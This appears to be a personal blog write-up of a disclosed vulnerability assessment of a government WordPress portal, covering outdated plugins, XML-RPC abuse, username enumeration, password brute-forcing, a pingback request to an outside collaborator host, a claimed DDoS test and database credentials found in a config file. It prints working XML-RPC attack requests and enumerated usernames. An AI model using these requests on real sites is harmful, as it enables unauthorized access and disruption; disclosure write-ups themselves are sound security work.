This is how I hacked National Informatics Centre (NIC) Portal
Note : All the vulnerabilities has been patched by government. only uploading for educational purpose. 😄
BUGS INDEX
1.Plugins/Updates
2. Information Disclosure
3. XMLRPC (All Operations)
4. Ddos Attack
5. BRUTEFORCE
6. Database Access
1. PLUGINS/UPDATE
WordPress version 4.1.23. This version is an outdated version of WordPress.
# WordPress <= 4.9.6 — Authenticated Arbitrary File Deletion :
This can lead to code execution and can be easily able to exploit by any of the users.# BigBlueButton < 2.2.4
This can lead to reflected cross-site scripting, XSS via closed captions because
dangerouslySetInnerHTML in React is used.
2. Information Disclosure
While scanning the site I found a link that showed so much internal data,
which can lead hackers to use that data.
3. XMLRPC
XMLRPC on WordPress is an API that allows developers to talk or communicate with WordPress websites. XMLRPC can do many things like PUBLISH, EDIT, DELETE, and UPLOAD files.
OUTPUT :
<script src=”/wp-content/plugins/bigbluebutton/js/jquery.min.js”></script>
<script>
//commented
$( document ).ready(function() {
$(‘#reload’).click(function() {
$(“#captchas”).attr(“src”, “captcha.php?”+(new Date()).getTime());
});
});
</script>
XML-RPC server accepts POST requests only.
OPERATIONS ON XMLRPC :
Ok, when I found XMLRPC, I have done all operations, and seriously all are successful, so I'm going to show all possible attacks SO, first of all, I've checked which attacks I can do.
Code {should be written in repeater}
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>
Almost all operations are present, so I can change, delete, create, and upload anything. Like: pingback. ping, mt. publish a post, metaWeblog.get post, metaWeblog.Newport, metaWeblog.delete the post, wp.getUserBlogs, wp.getCategories,metaWeblog.getUsers Blogs.
BRUTE FORCING PASSWORDS:
Before brute force, we have to find the username, do it already sharing
USERNAMES FOUND :
# superadmin
# Guru e
# Admin
# Test user
# user
Bruteforce code {written in POST {repeater}
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>pass</value></param>
</params>
</methodCall>
It means I am able to brute-force the login panel easily.
4. Cross-Site Port Attack
Code {written in request of repeater}
<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>http://k8tvf0ppfiioiuz0rt5b8ha22t8jw8.burpcollaborator.net</string></value>
</param><param><value><string>https://webcon.nic.in/?page_id=255</string>
</value></param></params>
</methodCall>
Time to craft a request via BURP to get the pingback to our server. I have to craft a request containing this POST data:
This response shows fault code and a value ,it means the port is open and I can verify it on my own server. So, I used my burp collaborator and got server logs !
4. INTERNAL DDOS ATTACK
After this much, I have done an internal Ddos attack and I found that the site can be down, it was taking n number of requests.
5. BRUTEFORCE :
After that, I take a wordlist of passwords to check whether it was taking requests or not and if I attack with the bulk of passwords and yes I found NO RATE LIMIT. I used 1000 password wordlist.
6. DATABASES :
While scanning the site i found a file name config.php
Where I founded DATABASE CREDENTIALS xD!!!! (koi zeher dedo mjhe)
Then, I WAS ABLE TO FIND THE MAIN ADMIN SETUP OF the WEBSITE!
HERE,now I am able to CREATE,DELETE new SERVER, USER. And I am able to create a new admin as well.
NOTE: I already reported the Vulnerabilities and all have been patched now.
Also received acknowledgment from NCIIPC.
Follow me :
Instagram: https://www.instagram.com/pranjal_y2j_/
Twitter: https://twitter.com/pranjal_y2j
Thank you !
Pranjal Sharma.
